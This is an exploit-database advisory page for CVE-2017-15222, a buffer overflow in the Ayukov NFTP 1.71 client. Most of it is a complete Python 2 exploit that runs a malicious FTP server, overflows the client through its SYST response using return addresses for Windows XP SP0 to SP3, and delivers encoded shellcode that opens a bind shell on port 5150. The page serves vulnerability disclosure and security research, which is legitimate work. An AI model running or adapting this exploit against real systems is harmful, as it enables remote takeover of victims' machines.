Ayukov NFTP 1.71 Buffer Overflow

2019.11.05
Credit: Chase Hatch
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow # Date: 2019-11-03 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://ayukov.com/nftp/ # Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe # Version: 1.71 # Tested on: Windows XP Pro SP0, SP1, SP2, SP3 # CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222 # Steps to reproduce: # Run the server with the valid Windows version # Connect the client to the malicious server # bind shell on port 5150 #!/usr/bin/env python2 import os, sys, socket NARGS = len(sys.argv) # ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll # 7C927543 FFD6 CALL ESI# Windows XP Pro SP2; ntdll.dll # 77E641C7 FFE6 JMP ESI# Windows XP Pro SP1; kernel32.dll # 77E667F3 FFE6 JMP ESI# Windows XP Pro SP0: kernel32.dll tourRETs = { "XPProSP3": "\x95\x3A\x92\x7c", "XPProSP2": "\x43\x75\x92\x7C", "XPProSP1": "\xc7\x41\xe6\x77", "XPProSP0": "\xf3\x67\xe6\x77" } if not NARGS > 1: print("USAGE: %s version" % sys.argv[0]) print("[.] version must be in:") for item in tourRETs: print("\t%s" % item) sys.exit(1) # sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP # ESP and ESI both pointers to somewhere in the As # If I increase the overflow string to 10000, the area ESP points to at crash #, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes. # sploit = "A"*10000 # sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP # `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116 sploit = "A"*4116 # Add the return address try: sploit += tourRETs[sys.argv[1]] except KeyError, x: print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x)) sys.exit(1) sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign. # echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs # badchars = "\x00\x0a\x0d" # locate EIP and align ESP to a close future 4 and 16 byte boundary NOTES = """\ $-37 > D9EE FLDZ $-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] $-31 > 59 POP ECX $-30 > 80C1 09 ADD CL,9 $-2D > 80C1 04 ADD CL,4 $-2A > 80C1 2A ADD CL,2A $-27 > 80C5 01 ADD CH,1 $-24 > 51 PUSH ECX $-23 > 5C POP ESP """ sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes sploit += "\x90" * 0x22 # ESP = EIP sploit += "\x90" * 20 # sled for shikata_ga_nai unpack # msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process # -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c sploit += ( "\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1" "\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57" "\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56" "\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79" "\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3" "\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa" "\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9" "\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82" "\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05" "\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8" "\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74" "\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68" "\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02" "\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde" "\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4" "\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba" "\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f" "\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83" "\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07" "\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51" "\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb" "\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4" "\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04" ) # 355 sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20) cases = { "USER": "331 user OK. Pass required", "PASS": "230 OK, current directory is /", # "SYST": "215 UNIX Type: L8", "SYST": sploit,# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP "TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"", "SITE UMASK": "500 SITE UMASK is an unknown extension", "CWD": "250 OK, current directory whatever you think it is", "PORT": "200 PORT command successful", "PASV": "227 Entering PASV mode", "LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total" } sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sx.bind(("192.168.56.181",21)) sx.listen(5) print("[.] Standing up HostileFTPd v0.0 alpha, port 21") cx,addr = sx.accept() print("[!] Connection received from %s" % str(addr)) cx.send("220 HostileFTPd v0.0 alpha !\r\n") notified = 0 while True: req = cx.recv(1024) for key, resp in cases.items(): if key in req: cx.send(resp + "\r\n") if "SITE UMASK" in req and notified == 0: print("[!] Buffer sent. Bind shell on client's port 5150?") notified = 1 if "PASV" in req: justpause = raw_input("[.] PASV received. Pausing recv buffer") NOTES="""\ ### followed TCP stream in normal client connect to ftp server 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 13:47. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. USER bozo 331 User bozo OK. Password required PASS theclown 230-User bozo has group access to: 1003 230 OK. Current directory is / SYST 215 UNIX Type: L8 TYPE I 200 TYPE is now 8-bit binary SITE UMASK 022 500 SITE UMASK is an unknown extension CWD / 250 OK. Current directory is / PASV 227 Entering Passive Mode (192,168,56,181,183,29) LIST -a 150 Accepted data connection 226-ASCII 226-Options: -a -l 226 3 matches total """


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top